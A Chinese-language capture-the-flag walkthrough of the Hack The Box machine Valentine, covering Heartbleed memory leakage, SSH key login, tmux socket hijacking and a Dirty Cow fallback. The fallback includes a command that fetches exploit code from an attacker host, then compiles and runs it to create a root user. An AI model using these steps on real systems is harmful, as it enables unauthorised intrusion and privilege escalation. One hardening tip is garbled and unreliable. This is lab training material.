HTB靶机Valentine渗透测试：Heartbleed与Tmux漏洞利用

1. 靶机环境概述

Valentine是一台运行Ubuntu 12.04 LTS系统的HTB靶机，内核版本为3.2.0-23-generic。该靶机主要暴露了三个网络服务：

• 22/tcp：OpenSSH 5.9p1
• 80/tcp：Apache httpd 2.2.22
• 443/tcp：Apache httpd 2.2.22 (SSL)

从Nmap扫描结果可以看出，这是一个典型的LAMP环境，但使用了较旧的软件版本。特别值得注意的是SSL证书的有效期（2018-2019年）暗示系统可能存在长期未更新的安全问题。

2. 信息收集阶段

2.1 端口扫描与服务识别

使用以下Nmap命令进行全端口扫描：

bash复制nmap -p- -sCV --min-rate 1000 10.10.10.79

关键发现：

• SSH服务显示"no mutual signature supported"警告，表明使用了较旧的密钥交换算法
• HTTP服务未返回有意义的页面标题
• HTTPS证书包含"valentine.htb"域名，提示可能需要配置hosts文件

2.2 Web目录枚举

使用Gobuster进行目录扫描：

bash复制gobuster dir -u http://10.10.10.79/ -t 100 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x txt,php

重要发现：

• /dev目录（状态码301）
• /encode和/decode端点（可能是加密功能）
• /omg路径（包含大量数据）

在/dev目录下发现关键文件：

• notes.txt：包含开发备注
• hype_key：加密的RSA私钥文件

3. 漏洞利用过程

3.1 Heartbleed漏洞利用

Heartbleed（CVE-2014-0160）是OpenSSL 1.0.1到1.0.1f版本中的严重漏洞，允许攻击者读取服务器内存中的敏感信息。

利用步骤：

1. 使用公开的Heartbleed漏洞利用脚本（如exploit-db 32745）
2. 从内存泄露中获取敏感信息
3. 成功获取到密码"heartbleedbelievethehype"

实际操作中发现，虽然获得了密码，但直接SSH登录仍存在问题。这是因为现代SSH客户端默认禁用了不安全的加密算法。

3.2 SSH登录绕过

解决方案是强制使用RSA算法：

bash复制ssh -o PubkeyAcceptedKeyTypes=ssh-rsa -i hype_key_encrypted hype@10.10.10.79

成功登录后，在用户目录发现：

• user.txt：用户flag
• .bash_history：包含历史命令记录
• .tmux.conf：tmux配置文件

4. 权限提升技术

4.1 Tmux会话劫持

通过分析.bash_history发现root用户使用tmux的痕迹：

bash复制tmux -S /.devs/dev_sess

利用方法：

1. 设置正确的TERM环境变量：

   bash复制export TERM=xterm
   

2. 直接连接root的tmux会话：

   bash复制tmux -S /.devs/dev_sess
   

这种方法之所以有效，是因为tmux的socket文件权限配置不当，允许其他用户访问。

4.2 Dirty Cow提权

作为备选方案，我们还可以使用Dirty Cow（CVE-2016-5195）漏洞提权：

1. 下载漏洞利用代码：

   bash复制wget http://10.10.16.14/40839.c
   

2. 编译并执行：

   bash复制gcc -pthread 40839.c -o dirty -lcrypt
   ./dirty
   

3. 创建新的root用户：

   bash复制su firefart
   

5. 技术细节分析

5.1 Heartbleed漏洞原理

Heartbleed漏洞源于OpenSSL的心跳扩展实现缺陷。当客户端发送恶意构造的心跳请求时，服务器会返回内存中的随机数据，可能包含敏感信息如：

• 会话Cookie
• 用户凭证
• 私钥数据

漏洞利用的关键是构造特殊的心跳包，指定超长的payload长度（如0x4000），诱使服务器返回内存数据。

5.2 Tmux会话安全问题

Tmux使用Unix域套接字进行通信。当使用-S参数指定socket路径时，如果权限设置不当（如全局可写），任何用户都可以连接到该会话。最佳实践是：

1. 将socket文件放在受保护目录
2. 设置严格的文件权限
3. 使用tmux -S /path/to/socket new -s session_name创建会话

5.3 Dirty Cow漏洞机制

Dirty Cow是Linux内核中的竞争条件漏洞，允许低权限用户修改只读内存映射。其核心是利用：

1. 写时复制（COW）机制
2. 内存映射文件的竞态条件
3. madvise()系统调用的特殊行为

漏洞利用通常通过修改/etc/passwd或/etc/shadow文件来添加特权用户。

6. 防御措施建议

6.1 针对Heartbleed

• 立即升级到OpenSSL 1.0.1g或更高版本
• 撤销并重新生成所有SSL证书
• 更换所有可能泄露的凭证

6.2 针对Tmux安全问题

• 避免使用全局可写的socket路径
• 设置umask 077限制新文件权限
• 考虑使用tmux -S /tmp/socket chmod 700限制访问

6.3 针对Dirty Cow

• 及时更新内核到修复版本
• 限制ptrace系统调用
• 使用grsecurity等加固方案

7. 渗透测试经验总结

1. 信息收集要全面：从Nmap扫描到目录枚举，每个细节都可能成为突破口
2. 历史记录很有价值：.bash_history等文件常包含重要线索
3. 权限配置检查：特别是/tmp、/dev等目录的权限设置
4. 会话管理安全：避免共享会话或使用不安全权限
5. 漏洞利用要有备选方案：当一种方法失效时能快速切换

在实际测试中，我注意到Ubuntu 12.04这类老旧系统往往存在多个可利用漏洞。建议在获得初始访问后，立即检查内核版本和已安装软件版本，寻找可能的提权途径。

8. 常见问题排查

Q: 为什么使用获取的密码无法SSH登录？
A: 可能是由于SSH算法不兼容，尝试添加"-o PubkeyAcceptedKeyTypes=ssh-rsa"参数

Q: Tmux连接失败显示"open terminal failed"怎么办？
A: 需要先设置TERM环境变量：export TERM=xterm

Q: Dirty Cow编译失败如何解决？
A: 确保安装了gcc和libc6-dev，或者尝试其他预编译的exploit

Q: 找不到/dev_sess文件怎么办？
A: 检查ps aux输出，确认tmux进程使用的确切socket路径

Q: 如何防止此类攻击？
A: 定期更新系统、限制服务权限、使用最小化安装原则、实施严格的权限控制